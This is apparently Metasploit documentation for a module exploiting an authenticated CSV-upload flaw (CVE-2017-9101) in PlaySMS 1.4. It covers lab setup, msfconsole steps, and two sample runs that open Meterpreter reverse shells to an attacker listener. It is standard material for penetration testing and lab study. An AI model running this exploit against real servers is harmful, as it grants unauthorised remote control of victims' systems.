## Description A malicious file can be uploaded by an authenticated attacker through the import.php (aka the Phonebook import feature) in PlaySMS version 1.4. Additional information and vulnerabilities can be viewed on Exploit-DB [42044]( https://www.exploit-db.com/exploits/42044/) and [CVE-2017-9101](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9101) ## Verification Steps Available at [Exploit-DB](https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz) ### Vulnerable Application Installation Setup. 1. Download Application : `wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz` 2. Extract : `tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz` 3. Move In WebDirectory : `mv playsms-1.4/web/* /var/www/html/` 4. make config file: `cp /var/www/html/config-dist.php /var/www/html/config.php` 5. Change Owner : `chown -R www-data:www-data /var/www/html/` 6. Set DB creds in config.php File. And dump playsms-1.4/db/playsms.sql in your playsms database. 7. Now Visit : http://localhost/ ## Verification Steps 1. Install the application 2. Start msfconsole 3. Do: `use exploit/multi/http/playsms_uploadcsv_exec` 4. Do: `set rport ` 5. Do: `set rhost ` 6. Do: `set targeturi SecreTSMSgatwayLogin` 7. Do: `set username touhid` 8. Do: `set password diana` 9. Do: `check` ``` [*] 10.22.1.10:80 The target appears to be vulnerable. ``` 10. Do: `set lport ` 11. Do: `set lhost ` 12. Do: `exploit` 13. You should get a shell. ## Scenarios ### Playsms on Ubuntu Linux ``` msf > use exploit/multi/http/playsms_uploadcsv_exec msf exploit(multi/http/playsms_uploadcsv_exec) > set rhost 10.22.1.7 rhost => 10.22.1.7 msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi SecreTSMSgatwayLogin targeturi => SecreTSMSgatwayLogin msf exploit(multi/http/playsms_uploadcsv_exec) > check [*] 10.22.1.7:80 The target appears to be vulnerable. msf exploit(multi/http/playsms_uploadcsv_exec) > set username touhid username => touhid msf exploit(multi/http/playsms_uploadcsv_exec) > set password diana password => diana msf exploit(multi/http/playsms_uploadcsv_exec) > set lhost 10.22.1.3 lhost => 10.22.1.3 msf exploit(multi/http/playsms_uploadcsv_exec) > run [*] Started reverse TCP handler on 10.22.1.3:4444 [+] X-CSRF-Token for login : c9ad6a45cd206228554b237985b344ef [*] Trying to Login ...... [+] Authentication successful: touhid:diana [+] X-CSRF-Token for upload : 112cd5ecbdf12daf60391609d19ae3d6 [*] Trying to upload malicious CSV file .... [*] Sending stage (37543 bytes) to 10.22.1.7 [*] Meterpreter session 2 opened (10.22.1.3:4444 -> 10.22.1.7:56580) at 2018-03-25 17:42:43 +0530 meterpreter > sysinfo Computer : Dina OS : Linux Dina 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 Meterpreter : php/linux meterpreter > ``` ### Playsms on Windows 7 ``` msf > use exploit/multi/http/playsms_uploadcsv_exec msf exploit(multi/http/playsms_uploadcsv_exec) > set rhost 10.22.1.9 rhost => 10.22.1.9 msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi web targeturi => web msf exploit(multi/http/playsms_uploadcsv_exec) > check [*] 10.22.1.9:80 The target appears to be vulnerable. msf exploit(multi/http/playsms_uploadcsv_exec) > set username test username => test msf exploit(multi/http/playsms_uploadcsv_exec) > set password metasploit password => metasploit msf exploit(multi/http/playsms_uploadcsv_exec) > set verbose true verbose => true msf exploit(multi/http/playsms_uploadcsv_exec) > exploit [*] Started reverse TCP handler on 10.22.1.3:4444 [+] X-CSRF-Token for login : cf467bf4829b355a5f4f2964e853ff2c [*] Trying to Login ...... [+] Authentication successful: test:metasploit [+] X-CSRF-Token for upload : 3aca00c2d6a5988ed74fa7d992e14904 [*] Trying to upload malicious CSV file .... [*] Sending stage (37543 bytes) to 10.22.1.9 [*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.9:50065) at 2018-03-25 17:27:57 +0530 meterpreter > sysinfo Computer : TOUHID-PC OS : Windows NT TOUHID-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586 Meterpreter : php/windows meterpreter > ```